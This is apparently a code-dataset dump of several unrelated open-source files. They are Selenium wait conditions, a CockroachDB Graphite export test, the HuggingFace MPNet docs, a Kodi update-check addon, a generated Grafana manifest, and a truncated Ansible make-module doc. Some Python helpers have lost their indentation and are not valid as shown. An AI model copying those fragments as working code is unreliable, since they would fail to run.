    def __init__(self, element):
        self.element = element

    def __call__(self, ignored):
        return _element_if_visible(self.element)
def _element_if_visible(element, visibility=True):
return element if element.is_displayed() == visibility else False
class presence_of_all_elements_located(object):
    """An expectation that at least one matching element is present.

    locator is used to find the elements;
    returns the list of WebElements once they are located.
    """

    def __init__(self, locator):
        self.locator = locator

    def __call__(self, driver):
        return _find_elements(driver, self.locator)
class text_to_be_present_in_element(object):
    """An expectation that the given text occurs in the located element's
    text.

    locator, text
    """

    def __init__(self, locator, text_):
        self.locator = locator
        self.text = text_

    def __call__(self, driver):
        try:
            return self.text in _find_element(driver, self.locator).text
        except StaleElementReferenceException:
            return False
class text_to_be_present_in_element_value(object):
    """
    An expectation for checking if the given text is present in the element's
    "value" attribute.

    locator, text
    """
    def __init__(self, locator, text_):
        self.locator = locator
        self.text = text_

    def __call__(self, driver):
        try:
            element_text = _find_element(driver,
                                         self.locator).get_attribute("value")
            # A missing/None value attribute counts as "text not present".
            if element_text:
                return self.text in element_text
            else:
                return False
        except StaleElementReferenceException:
            return False
class frame_to_be_available_and_switch_to_it(object):
    """An expectation for checking whether the given frame is available to
    switch to. If the frame is available it switches the given driver to the
    specified frame and returns True; otherwise returns False.
    """

    def __init__(self, locator):
        self.frame_locator = locator

    def __call__(self, driver):
        try:
            target = self.frame_locator
            if isinstance(target, tuple):
                # (by, path) locator: resolve to an element first.
                target = _find_element(driver, target)
            driver.switch_to.frame(target)
        except NoSuchFrameException:
            return False
        return True
class invisibility_of_element_located(object):
    """An expectation that an element is either invisible or absent from
    the DOM.

    locator used to find the element
    """

    def __init__(self, locator):
        self.locator = locator

    def __call__(self, driver):
        try:
            return _element_if_visible(_find_element(driver, self.locator), False)
        except (NoSuchElementException, StaleElementReferenceException):
            # Not in the DOM at all, or stale (detached) -- either way the
            # element is no longer visible, so the condition holds.
            return True
class element_to_be_clickable(object):
    """An expectation that an element is visible and enabled such that you
    can click it; returns the element when clickable, False otherwise.
    """

    def __init__(self, locator):
        self.locator = locator

    def __call__(self, driver):
        element = visibility_of_element_located(self.locator)(driver)
        if not element:
            return False
        return element if element.is_enabled() else False
class staleness_of(object):
    """Wait until a known element is no longer attached to the DOM.

    element is the element to wait for;
    returns False while the element is still attached, True once it is stale.
    """

    def __init__(self, element):
        self.element = element

    def __call__(self, ignored):
        try:
            # Any call on the element forces a staleness check.
            self.element.is_enabled()
        except StaleElementReferenceException:
            return True
        return False
class element_to_be_selected(object):
    """Expectation that the given WebElement is selected.

    ``element`` is a WebElement object.
    """

    def __init__(self, element):
        self.element = element

    def __call__(self, ignored):
        # Delegate directly to the element's own selection state.
        return self.element.is_selected()
class element_located_to_be_selected(object):
    """Expectation that the element found via ``locator`` is selected.

    ``locator`` is a (by, path) tuple.
    """

    def __init__(self, locator):
        self.locator = locator

    def __call__(self, driver):
        element = _find_element(driver, self.locator)
        return element.is_selected()
class element_selection_state_to_be(object):
    """Expectation that the given element's selection state matches
    ``is_selected``.

    ``element`` is a WebElement object; ``is_selected`` is a boolean.
    """

    def __init__(self, element, is_selected):
        self.element = element
        self.is_selected = is_selected

    def __call__(self, ignored):
        # True when the element's current state equals the wanted state.
        return self.element.is_selected() == self.is_selected
class element_located_selection_state_to_be(object):
    """Expectation that the element found via ``locator`` has the given
    selection state.

    ``locator`` is a (by, path) tuple; ``is_selected`` is a boolean.
    """

    def __init__(self, locator, is_selected):
        self.locator = locator
        self.is_selected = is_selected

    def __call__(self, driver):
        try:
            state = _find_element(driver, self.locator).is_selected()
        except StaleElementReferenceException:
            # The element went stale mid-check; report failure so the
            # wait retries.
            return False
        return state == self.is_selected
class alert_is_present(object):
    """Expectation that a modal alert is currently displayed.

    Returns the alert object when one is present, otherwise False.
    """

    def __init__(self):
        pass

    def __call__(self, driver):
        try:
            present = driver.switch_to.alert
            # Accessing .text forces the driver to resolve the alert now
            # rather than lazily, surfacing NoAlertPresentException here.
            present.text
        except NoAlertPresentException:
            return False
        return present
def _find_element(driver, by):
"""Looks up an element. Logs and re-raises ``WebDriverException``
if thrown."""
try :
return driver.find_element(*by)
except NoSuchElementException as e:
raise e
except WebDriverException as e:
raise e
def _find_elements(driver, by):
    """Look up a list of elements via ``driver.find_elements(*by)``;
    re-raises ``WebDriverException`` unchanged."""
    try :
        return driver.find_elements(*by)
    except WebDriverException as e:
raise e | unknown | codeparrot/codeparrot-clean | ||
// Copyright 2018 The Cockroach Authors.
//
// Use of this software is governed by the CockroachDB Software License
// included in the /LICENSE file.
package server
import (
"context"
"fmt"
"net"
"testing"
"time"
"github.com/cockroachdb/cockroach/pkg/base"
"github.com/cockroachdb/cockroach/pkg/testutils/serverutils"
"github.com/cockroachdb/cockroach/pkg/testutils/sqlutils"
"github.com/cockroachdb/cockroach/pkg/util/leaktest"
"github.com/cockroachdb/cockroach/pkg/util/log"
)
// TestGraphite tests that a server pushes metrics data to Graphite endpoint,
// if configured. In addition, it verifies that things don't fall apart when
// the endpoint goes away.
//
// TODO(obs-inf): this test takes 2m because GraphiteExporter.Push times out after
// 2m with a `write: broken pipe` error, even though it's using a DialTimeout. This
// is a waste of time.
func TestGraphite(t *testing.T) {
	defer leaktest.AfterTest(t)()
	defer log.Scope(t).Close(t)

	// Start a single-node test server whose metrics will be exported.
	s, rawDB, _ := serverutils.StartServer(t, base.TestServerArgs{})
	defer s.Stopper().Stop(context.Background())
	ctx := context.Background()
	const setQ = `SET CLUSTER SETTING "%s" = "%s"`
	// Push very frequently so the listener below sees a connection quickly.
	const interval = 3 * time.Millisecond
	db := sqlutils.MakeSQLRunner(rawDB)
	db.Exec(t, fmt.Sprintf(setQ, graphiteIntervalKey, interval))

	// listen opens an ephemeral TCP port, points the server's Graphite
	// exporter at it, and blocks until the exporter connects once.
	listen := func() {
		lis, err := net.Listen("tcp", "127.0.0.1:0")
		if err != nil {
			t.Fatal("failed to open port", err)
		}
		p := lis.Addr().String()
		log.Dev.Infof(ctx, "Open port %s and listening", p)
		defer func() {
			log.Dev.Infof(ctx, "Close port %s", p)
			if err := lis.Close(); err != nil {
				t.Fatal("failed to close port", err)
			}
		}()
		// Only publish the endpoint once the port is actually listening.
		db.Exec(t, fmt.Sprintf(setQ, "external.graphite.endpoint", p))
		if _, e := lis.Accept(); e != nil {
			t.Fatal("failed to receive connection", e)
		} else {
			log.Dev.Info(ctx, "received connection")
		}
	}

	// First round: verify metrics are pushed to a live endpoint.
	listen()
	log.Dev.Info(ctx, "Make sure things don't fall apart when endpoint goes away.")
	// Let several push intervals elapse with no listener, then verify the
	// exporter recovers once an endpoint is available again.
	time.Sleep(5 * interval)
	listen()
} | go | github | https://github.com/cockroachdb/cockroach | pkg/server/graphite_test.go |
<!--Copyright 2020 The HuggingFace Team. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
⚠️ Note that this file is in Markdown but contains specific syntax for our doc-builder (similar to MDX) that may not be
rendered properly in your Markdown viewer.
-->
*This model was released on 2020-04-20 and added to Hugging Face Transformers on 2020-12-09.*
# MPNet
<div class="flex flex-wrap space-x-1">
<img alt="PyTorch" src="https://img.shields.io/badge/PyTorch-DE3412?style=flat&logo=pytorch&logoColor=white">
</div>
## Overview
The MPNet model was proposed in [MPNet: Masked and Permuted Pre-training for Language Understanding](https://huggingface.co/papers/2004.09297) by Kaitao Song, Xu Tan, Tao Qin, Jianfeng Lu, Tie-Yan Liu.
MPNet adopts a novel pre-training method, named masked and permuted language modeling, to inherit the advantages of
masked language modeling and permuted language modeling for natural language understanding.
The abstract from the paper is the following:
*BERT adopts masked language modeling (MLM) for pre-training and is one of the most successful pre-training models.
Since BERT neglects dependency among predicted tokens, XLNet introduces permuted language modeling (PLM) for
pre-training to address this problem. However, XLNet does not leverage the full position information of a sentence and
thus suffers from position discrepancy between pre-training and fine-tuning. In this paper, we propose MPNet, a novel
pre-training method that inherits the advantages of BERT and XLNet and avoids their limitations. MPNet leverages the
dependency among predicted tokens through permuted language modeling (vs. MLM in BERT), and takes auxiliary position
information as input to make the model see a full sentence and thus reducing the position discrepancy (vs. PLM in
XLNet). We pre-train MPNet on a large-scale dataset (over 160GB text corpora) and fine-tune on a variety of
down-streaming tasks (GLUE, SQuAD, etc). Experimental results show that MPNet outperforms MLM and PLM by a large
margin, and achieves better results on these tasks compared with previous state-of-the-art pre-trained methods (e.g.,
BERT, XLNet, RoBERTa) under the same model setting.*
The original code can be found [here](https://github.com/microsoft/MPNet).
## Usage tips
MPNet doesn't have `token_type_ids`, so you don't need to indicate which token belongs to which segment. Just
separate your segments with the separation token `tokenizer.sep_token` (or `[sep]`).
## Resources
- [Text classification task guide](../tasks/sequence_classification)
- [Token classification task guide](../tasks/token_classification)
- [Question answering task guide](../tasks/question_answering)
- [Masked language modeling task guide](../tasks/masked_language_modeling)
- [Multiple choice task guide](../tasks/multiple_choice)
## MPNetConfig
[[autodoc]] MPNetConfig
## MPNetTokenizer
[[autodoc]] MPNetTokenizer
- get_special_tokens_mask
- save_vocabulary
## MPNetTokenizerFast
[[autodoc]] MPNetTokenizerFast
## MPNetModel
[[autodoc]] MPNetModel
- forward
## MPNetForMaskedLM
[[autodoc]] MPNetForMaskedLM
- forward
## MPNetForSequenceClassification
[[autodoc]] MPNetForSequenceClassification
- forward
## MPNetForMultipleChoice
[[autodoc]] MPNetForMultipleChoice
- forward
## MPNetForTokenClassification
[[autodoc]] MPNetForTokenClassification
- forward
## MPNetForQuestionAnswering
[[autodoc]] MPNetForQuestionAnswering
- forward | unknown | github | https://github.com/huggingface/transformers | docs/source/en/model_doc/mpnet.md |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Team-XBMC
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import platform
import sys

import xbmc

import lib.common
from lib.common import log, dialog_yesno
from lib.common import upgrade_message as _upgrademessage
from lib.common import upgrade_message2 as _upgrademessage2
ADDON = lib.common.ADDON
ADDONVERSION = lib.common.ADDONVERSION
ADDONNAME = lib.common.ADDONNAME
ADDONPATH = lib.common.ADDONPATH
ICON = lib.common.ICON
oldversion = False
class Main:
    """Entry point: waits briefly after Kodi startup, then checks whether a
    newer Kodi version is available and notifies the user if so."""

    def __init__(self):
        # Give Kodi time to finish starting up before doing any work.
        xbmc.sleep(5000)
        if xbmc.getCondVisibility('System.Platform.Linux') and ADDON.getSetting("upgrade_apt") == 'true':
            # On Linux with apt support enabled, check the package manager.
            _versionchecklinux(['kodi'])
        else:
            # Otherwise compare against the published version file.
            oldversion, version_installed, version_available, version_stable = _versioncheck()
            if oldversion:
                _upgrademessage2(version_installed, version_available, version_stable, oldversion, False)
def _versioncheck():
    """Compare the installed Kodi version against the published version
    file.

    Returns the (oldversion, version_installed, version_available,
    version_stable) tuple produced by ``compare_version``.
    """
    from lib.jsoninterface import get_installedversion, get_versionfilelist
    from lib.versions import compare_version
    # Fetch the published version list and the locally installed version,
    # then compare the two to see whether an upgrade is available.
    available_versions = get_versionfilelist()
    installed = get_installedversion()
    return compare_version(installed, available_versions)
def _versionchecklinux(packages):
    """Check for (and optionally install) Kodi package updates via apt.

    packages: list of package names; only the first entry is checked.
    Only Debian-style distributions are supported; on anything else a
    message is logged and the addon exits.
    """
    # NOTE(review): platform.dist() is deprecated and removed in Python 3.8;
    # fine for Kodi's bundled interpreter, but will need replacing on
    # newer Pythons — confirm against the target Kodi version.
    if platform.dist()[0].lower() in ['ubuntu', 'debian', 'linuxmint']:
        handler = False
        result = False
        try:
            # Prefer aptdaemon, which handles privilege escalation itself.
            from lib.aptdeamonhandler import AptdeamonHandler
            handler = AptdeamonHandler()
        except Exception:
            # Fall back to shelling out to apt.  That needs the user's
            # password, so ask before checking for a new version.
            from lib.shellhandlerapt import ShellHandlerApt
            sudo = True
            handler = ShellHandlerApt(sudo)
            if dialog_yesno(32015):
                pass
            elif dialog_yesno(32009, 32010):
                log("disabling addon by user request")
                ADDON.setSetting("versioncheck_enable", 'false')
                return
        if handler:
            if handler.check_upgrade_available(packages[0]):
                if _upgrademessage(32012, oldversion, True):
                    if ADDON.getSetting("upgrade_system") == "false":
                        result = handler.upgrade_package(packages[0])
                    else:
                        result = handler.upgrade_system()
                    if result:
                        from lib.common import message_upgrade_success, message_restart
                        message_upgrade_success()
                        message_restart()
                    else:
                        log("Error during upgrade")
        else:
            log("Error: no handler found")
    else:
        log("Unsupported platform %s" % platform.dist()[0])
        # Bug fix: `sys` was used here without ever being imported, so this
        # path raised NameError instead of exiting cleanly.
        sys.exit(0)
# Kodi invokes this addon as a script; log the version and start the check.
if (__name__ == "__main__"):
    log('Version %s started' % ADDONVERSION)
Main() | unknown | codeparrot/codeparrot-clean | ||
//
// This file is generated by grafana-app-sdk
// DO NOT EDIT
//
package manifestdata
import (
"encoding/json"
"fmt"
"strings"
"github.com/grafana/grafana-app-sdk/app"
"github.com/grafana/grafana-app-sdk/resource"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/kube-openapi/pkg/spec3"
"k8s.io/kube-openapi/pkg/validation/spec"
v1alpha1 "github.com/grafana/grafana/apps/dashvalidator/pkg/apis/dashvalidator/v1alpha1"
)
var (
rawSchemaDashboardCompatibilityScorev1alpha1 = []byte(`{"DashboardCompatibilityScore":{"properties":{"spec":{"$ref":"#/components/schemas/spec"},"status":{"$ref":"#/components/schemas/status"}},"required":["spec"]},"DataSourceMapping":{"additionalProperties":false,"description":"DataSourceMapping specifies a datasource to validate dashboard queries against.\nMaps logical datasource references in the dashboard to actual datasource instances.","properties":{"name":{"description":"Optional human-readable name for display in results.\nIf not provided, UID will be used in error messages.\nExample: \"Production Prometheus (US-West)\"","type":"string"},"type":{"description":"Type of datasource plugin.\nMVP: Only \"prometheus\" supported.\nFuture: \"mysql\", \"postgres\", \"elasticsearch\", etc.","type":"string"},"uid":{"description":"Unique identifier of the datasource instance.\nExample: \"prometheus-prod-us-west\"","type":"string"}},"required":["uid","type"],"type":"object"},"DataSourceResult":{"additionalProperties":false,"description":"DataSourceResult contains validation results for a single datasource.\nProvides aggregate statistics and per-query breakdown of compatibility.","properties":{"checkedQueries":{"description":"Number of queries successfully validated.\nMay be less than totalQueries if some queries couldn't be parsed.","type":"integer"},"compatibilityScore":{"description":"Overall compatibility score for this datasource (0-100).\nCalculated as: (foundMetrics / totalMetrics) * 100\nUsed to calculate the global compatibilityScore in status.","type":"number"},"foundMetrics":{"description":"Number of metrics that exist in the datasource schema.\nfoundMetrics \u003c= totalMetrics","type":"integer"},"missingMetrics":{"description":"Array of metric names that were referenced but don't exist.\nUseful for debugging why a dashboard shows \"no data\".\nExample for Prometheus: [\"http_requests_total\", 
\"api_latency_seconds\"]","items":{"type":"string"},"type":"array"},"name":{"description":"Optional display name (matches DataSourceMapping.name if provided)","type":"string"},"queryBreakdown":{"description":"Per-query breakdown showing which specific queries have issues.\nOne entry per query target (refId: \"A\", \"B\", \"C\", etc.) in each panel.\nAllows pinpointing exactly which panel/query needs fixing.","items":{"$ref":"#/components/schemas/QueryBreakdown"},"type":"array"},"totalMetrics":{"description":"Total number of unique metrics/identifiers referenced across all queries.\nFor Prometheus: metric names extracted from PromQL expressions.\nFor SQL datasources: table and column names.","type":"integer"},"totalQueries":{"description":"Total number of queries in the dashboard targeting this datasource.\nIncludes all panel targets/queries that reference this datasource.","type":"integer"},"type":{"description":"Datasource type (matches DataSourceMapping.type)","type":"string"},"uid":{"description":"Datasource UID that was validated (matches DataSourceMapping.uid)","type":"string"}},"required":["uid","type","totalQueries","checkedQueries","totalMetrics","foundMetrics","missingMetrics","queryBreakdown","compatibilityScore"],"type":"object"},"OperatorState":{"additionalProperties":false,"properties":{"descriptiveState":{"description":"descriptiveState is an optional more descriptive state field which has no requirements on format","type":"string"},"details":{"additionalProperties":true,"description":"details contains any extra information that is operator-specific","type":"object"},"lastEvaluation":{"description":"lastEvaluation is the ResourceVersion last evaluated","type":"string"},"state":{"description":"state describes the state of the lastEvaluation.\nIt is limited to three possible states for machine 
evaluation.","enum":["success","in_progress","failed"],"type":"string"}},"required":["lastEvaluation","state"],"type":"object"},"QueryBreakdown":{"additionalProperties":false,"description":"QueryBreakdown provides compatibility details for a single query within a panel.\nGranular per-query results allow users to identify exactly which queries need fixing.\n\nNote: A panel can have multiple queries (refId: \"A\", \"B\", \"C\", etc.),\nso there may be multiple QueryBreakdown entries for the same panelID.","properties":{"compatibilityScore":{"description":"Compatibility percentage for this individual query (0-100).\nCalculated as: (foundMetrics / totalMetrics) * 100\n100 = query will work perfectly, 0 = query will return no data.","type":"number"},"foundMetrics":{"description":"Number of those metrics that exist in the datasource.\nfoundMetrics \u003c= totalMetrics","type":"integer"},"missingMetrics":{"description":"Array of missing metric names specific to this query.\nHelps identify exactly which part of a query expression will fail.\nEmpty array means query is fully compatible.","items":{"type":"string"},"type":"array"},"panelID":{"description":"Numeric panel ID from dashboard JSON.\nUsed to correlate with dashboard structure.","type":"integer"},"panelTitle":{"description":"Human-readable panel title for context.\nExample: \"CPU Usage\", \"Request Rate\"","type":"string"},"queryRefId":{"description":"Query identifier within the panel.\nValues: \"A\", \"B\", \"C\", etc. 
(from panel.targets[].refId)\nUniquely identifies which query in a multi-query panel this refers to.","type":"string"},"totalMetrics":{"description":"Number of unique metrics referenced in this specific query.\nFor Prometheus: metrics extracted from the PromQL expr.\nExample: rate(http_requests_total[5m]) references 1 metric.","type":"integer"}},"required":["panelTitle","panelID","queryRefId","totalMetrics","foundMetrics","missingMetrics","compatibilityScore"],"type":"object"},"spec":{"additionalProperties":false,"properties":{"dashboardJson":{"additionalProperties":true,"description":"Complete dashboard JSON object to validate.\nMust be a v1 dashboard schema (contains \"panels\" array).\nv2 dashboards (with \"elements\" structure) are not yet supported.","type":"object"},"datasourceMappings":{"description":"Array of datasources to validate against.\nThe validator will check dashboard queries against each datasource\nand provide per-datasource compatibility results.\n\nMVP: Only single datasource supported (array length = 1), Prometheus type only.\nFuture: Will support multiple datasources for dashboards with mixed queries.","items":{"$ref":"#/components/schemas/DataSourceMapping"},"type":"array"}},"required":["dashboardJson","datasourceMappings"],"type":"object"},"status":{"additionalProperties":false,"properties":{"additionalFields":{"additionalProperties":true,"description":"additionalFields is reserved for future use","type":"object"},"compatibilityScore":{"description":"Overall compatibility score across all datasources (0-100).\nCalculated as: (total found metrics / total referenced metrics) * 100\n\nScore interpretation:\n- 100: Perfect compatibility, all queries will work\n- 80-99: Excellent, minor missing metrics\n- 50-79: Fair, significant missing metrics\n- 0-49: Poor, most queries will fail","type":"number"},"datasourceResults":{"description":"Per-datasource validation results.\nArray length matches spec.datasourceMappings.\nEach element contains 
detailed metrics and query-level breakdown.","items":{"$ref":"#/components/schemas/DataSourceResult"},"type":"array"},"lastChecked":{"description":"ISO 8601 timestamp of when validation was last performed.\nExample: \"2024-01-15T10:30:00Z\"","type":"string"},"message":{"description":"Human-readable summary of validation result.\nExamples: \"All queries compatible\", \"3 missing metrics found\"","type":"string"},"operatorStates":{"additionalProperties":{"$ref":"#/components/schemas/OperatorState"},"description":"operatorStates is a map of operator ID to operator state evaluations.\nAny operator which consumes this kind SHOULD add its state evaluation information to this field.","type":"object"}},"required":["compatibilityScore","datasourceResults"],"type":"object"}}`)
versionSchemaDashboardCompatibilityScorev1alpha1 app.VersionSchema
_ = json.Unmarshal(rawSchemaDashboardCompatibilityScorev1alpha1, &versionSchemaDashboardCompatibilityScorev1alpha1)
)
var appManifestData = app.ManifestData{
AppName: "dashvalidator",
Group: "dashvalidator.grafana.app",
PreferredVersion: "v1alpha1",
Versions: []app.ManifestVersion{
{
Name: "v1alpha1",
Served: true,
Kinds: []app.ManifestVersionKind{
{
Kind: "DashboardCompatibilityScore",
Plural: "DashboardCompatibilityScores",
Scope: "Namespaced",
Conversion: false,
Schema: &versionSchemaDashboardCompatibilityScorev1alpha1,
},
},
Routes: app.ManifestVersionRoutes{
Namespaced: map[string]spec3.PathProps{
"/check": {
Post: &spec3.Operation{
OperationProps: spec3.OperationProps{
OperationId: "createCheck",
RequestBody: &spec3.RequestBody{
RequestBodyProps: spec3.RequestBodyProps{
Required: true,
Content: map[string]*spec3.MediaType{
"application/json": {
MediaTypeProps: spec3.MediaTypeProps{
Schema: &spec.Schema{
SchemaProps: spec.SchemaProps{
Type: []string{"object"},
Properties: map[string]spec.Schema{
"dashboardJson": {
SchemaProps: spec.SchemaProps{
Type: []string{"object"},
AdditionalProperties: &spec.SchemaOrBool{
Allows: true,
},
},
},
"datasourceMappings": {
SchemaProps: spec.SchemaProps{
Type: []string{"array"},
Items: &spec.SchemaOrArray{
Schema: &spec.Schema{
SchemaProps: spec.SchemaProps{
Type: []string{"object"},
Properties: map[string]spec.Schema{
"name": {
SchemaProps: spec.SchemaProps{
Type: []string{"string"},
},
},
"type": {
SchemaProps: spec.SchemaProps{
Type: []string{"string"},
},
},
"uid": {
SchemaProps: spec.SchemaProps{
Type: []string{"string"},
},
},
},
Required: []string{
"uid",
"type",
},
}},
},
},
},
},
Required: []string{
"dashboardJson",
"datasourceMappings",
},
}},
}},
},
}},
Responses: &spec3.Responses{
ResponsesProps: spec3.ResponsesProps{
Default: &spec3.Response{
ResponseProps: spec3.ResponseProps{
Description: "Default OK response",
Content: map[string]*spec3.MediaType{
"application/json": {
MediaTypeProps: spec3.MediaTypeProps{
Schema: &spec.Schema{
SchemaProps: spec.SchemaProps{
Type: []string{"object"},
Properties: map[string]spec.Schema{
"apiVersion": {
SchemaProps: spec.SchemaProps{
Type: []string{"string"},
Description: "APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources",
},
},
"compatibilityScore": {
SchemaProps: spec.SchemaProps{
Type: []string{"number"},
},
},
"datasourceResults": {
SchemaProps: spec.SchemaProps{
Type: []string{"array"},
Items: &spec.SchemaOrArray{
Schema: &spec.Schema{
SchemaProps: spec.SchemaProps{
Type: []string{"object"},
Properties: map[string]spec.Schema{
"checkedQueries": {
SchemaProps: spec.SchemaProps{
Type: []string{"integer"},
},
},
"compatibilityScore": {
SchemaProps: spec.SchemaProps{
Type: []string{"number"},
},
},
"foundMetrics": {
SchemaProps: spec.SchemaProps{
Type: []string{"integer"},
},
},
"missingMetrics": {
SchemaProps: spec.SchemaProps{
Type: []string{"array"},
Items: &spec.SchemaOrArray{
Schema: &spec.Schema{
SchemaProps: spec.SchemaProps{
Type: []string{"string"},
}},
},
},
},
"name": {
SchemaProps: spec.SchemaProps{
Type: []string{"string"},
},
},
"queryBreakdown": {
SchemaProps: spec.SchemaProps{
Type: []string{"array"},
Items: &spec.SchemaOrArray{
Schema: &spec.Schema{
SchemaProps: spec.SchemaProps{
Type: []string{"object"},
Properties: map[string]spec.Schema{
"compatibilityScore": {
SchemaProps: spec.SchemaProps{
Type: []string{"number"},
},
},
"foundMetrics": {
SchemaProps: spec.SchemaProps{
Type: []string{"integer"},
},
},
"missingMetrics": {
SchemaProps: spec.SchemaProps{
Type: []string{"array"},
Items: &spec.SchemaOrArray{
Schema: &spec.Schema{
SchemaProps: spec.SchemaProps{
Type: []string{"string"},
}},
},
},
},
"panelID": {
SchemaProps: spec.SchemaProps{
Type: []string{"integer"},
},
},
"panelTitle": {
SchemaProps: spec.SchemaProps{
Type: []string{"string"},
},
},
"queryRefId": {
SchemaProps: spec.SchemaProps{
Type: []string{"string"},
},
},
"totalMetrics": {
SchemaProps: spec.SchemaProps{
Type: []string{"integer"},
},
},
},
Required: []string{
"panelTitle",
"panelID",
"queryRefId",
"totalMetrics",
"foundMetrics",
"missingMetrics",
"compatibilityScore",
},
}},
},
},
},
"totalMetrics": {
SchemaProps: spec.SchemaProps{
Type: []string{"integer"},
},
},
"totalQueries": {
SchemaProps: spec.SchemaProps{
Type: []string{"integer"},
},
},
"type": {
SchemaProps: spec.SchemaProps{
Type: []string{"string"},
},
},
"uid": {
SchemaProps: spec.SchemaProps{
Type: []string{"string"},
},
},
},
Required: []string{
"uid",
"type",
"totalQueries",
"checkedQueries",
"totalMetrics",
"foundMetrics",
"missingMetrics",
"queryBreakdown",
"compatibilityScore",
},
}},
},
},
},
"kind": {
SchemaProps: spec.SchemaProps{
Type: []string{"string"},
Description: "Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds",
},
},
},
Required: []string{
"compatibilityScore",
"datasourceResults",
"apiVersion",
"kind",
},
}},
}},
},
},
},
}},
},
},
},
},
Cluster: map[string]spec3.PathProps{},
Schemas: map[string]spec.Schema{},
},
},
},
}
func LocalManifest() app.Manifest {
return app.NewEmbeddedManifest(appManifestData)
}
func RemoteManifest() app.Manifest {
return app.NewAPIServerManifest("dashvalidator")
}
var kindVersionToGoType = map[string]resource.Kind{
"DashboardCompatibilityScore/v1alpha1": v1alpha1.DashboardCompatibilityScoreKind(),
}
// ManifestGoTypeAssociator returns the associated resource.Kind instance for a given Kind and Version, if one exists.
// If there is no association for the provided Kind and Version, exists will return false.
func ManifestGoTypeAssociator(kind, version string) (goType resource.Kind, exists bool) {
goType, exists = kindVersionToGoType[fmt.Sprintf("%s/%s", kind, version)]
return goType, exists
}
var customRouteToGoResponseType = map[string]any{
"v1alpha1||<namespace>/check|POST": v1alpha1.CreateCheckResponse{},
}
// ManifestCustomRouteResponsesAssociator returns the associated response go type for a given kind, version, custom route path, and method, if one exists.
// kind may be empty for custom routes which are not kind subroutes. Leading slashes are removed from subroute paths.
// If there is no association for the provided kind, version, custom route path, and method, exists will return false.
// Resource routes (those without a kind) should prefix their route with "<namespace>/" if the route is namespaced (otherwise the route is assumed to be cluster-scope)
func ManifestCustomRouteResponsesAssociator(kind, version, path, verb string) (goType any, exists bool) {
if len(path) > 0 && path[0] == '/' {
path = path[1:]
}
goType, exists = customRouteToGoResponseType[fmt.Sprintf("%s|%s|%s|%s", version, kind, path, strings.ToUpper(verb))]
return goType, exists
}
var customRouteToGoParamsType = map[string]runtime.Object{}
func ManifestCustomRouteQueryAssociator(kind, version, path, verb string) (goType runtime.Object, exists bool) {
if len(path) > 0 && path[0] == '/' {
path = path[1:]
}
goType, exists = customRouteToGoParamsType[fmt.Sprintf("%s|%s|%s|%s", version, kind, path, strings.ToUpper(verb))]
return goType, exists
}
var customRouteToGoRequestBodyType = map[string]any{
"v1alpha1||<namespace>/check|POST": v1alpha1.CreateCheckRequestBody{},
}
func ManifestCustomRouteRequestBodyAssociator(kind, version, path, verb string) (goType any, exists bool) {
if len(path) > 0 && path[0] == '/' {
path = path[1:]
}
goType, exists = customRouteToGoRequestBodyType[fmt.Sprintf("%s|%s|%s|%s", version, kind, path, strings.ToUpper(verb))]
return goType, exists
}
type GoTypeAssociator struct{}
func NewGoTypeAssociator() *GoTypeAssociator {
return &GoTypeAssociator{}
}
func (g *GoTypeAssociator) KindToGoType(kind, version string) (goType resource.Kind, exists bool) {
return ManifestGoTypeAssociator(kind, version)
}
func (g *GoTypeAssociator) CustomRouteReturnGoType(kind, version, path, verb string) (goType any, exists bool) {
return ManifestCustomRouteResponsesAssociator(kind, version, path, verb)
}
func (g *GoTypeAssociator) CustomRouteQueryGoType(kind, version, path, verb string) (goType runtime.Object, exists bool) {
return ManifestCustomRouteQueryAssociator(kind, version, path, verb)
}
func (g *GoTypeAssociator) CustomRouteRequestBodyGoType(kind, version, path, verb string) (goType any, exists bool) {
return ManifestCustomRouteRequestBodyAssociator(kind, version, path, verb)
} | go | github | https://github.com/grafana/grafana | apps/dashvalidator/pkg/apis/manifestdata/dashvalidator_manifest.go |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2015, Linus Unnebäck <linus@folkdatorn.se>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
# Standard Ansible module metadata (status/support level shown by ansible-doc).
ANSIBLE_METADATA = {'metadata_version': '1.1',
                    'status': ['preview'],
                    'supported_by': 'community'}
# Module documentation rendered by ansible-doc.  Fixed: a stray trailing
# quote after C(all). in the target description, and a missing space
# after the comma in the same line.
DOCUMENTATION = r'''
---
module: make
short_description: Run targets in a Makefile
requirements:
  - make
version_added: "2.1"
author: Linus Unnebäck (@LinusU) <linus@folkdatorn.se>
description:
  - Run targets in a Makefile.
options:
  target:
    description:
      - The target to run.
      - Typically this would be something like C(install), C(test) or C(all).
    type: str
  params:
    description:
      - Any extra parameters to pass to make.
    type: dict
  chdir:
    description:
      - Change to this directory before running make.
    type: path
    required: true
  file:
    description:
      - Use a custom Makefile.
    type: path
    version_added: '2.5'
'''
EXAMPLES = r'''
- name: Build the default target
make:
chdir: /home/ubuntu/cool-project
- name: Run 'install' target as root
make:
chdir: /home/ubuntu/cool-project
target: install
become: yes
- name: Build 'all' target with extra arguments
make:
chdir: /home/ubuntu/cool-project
target: all
params:
NUM_THREADS: 4
BACKEND: lapack
- name: Build 'all' target with a custom Makefile
make:
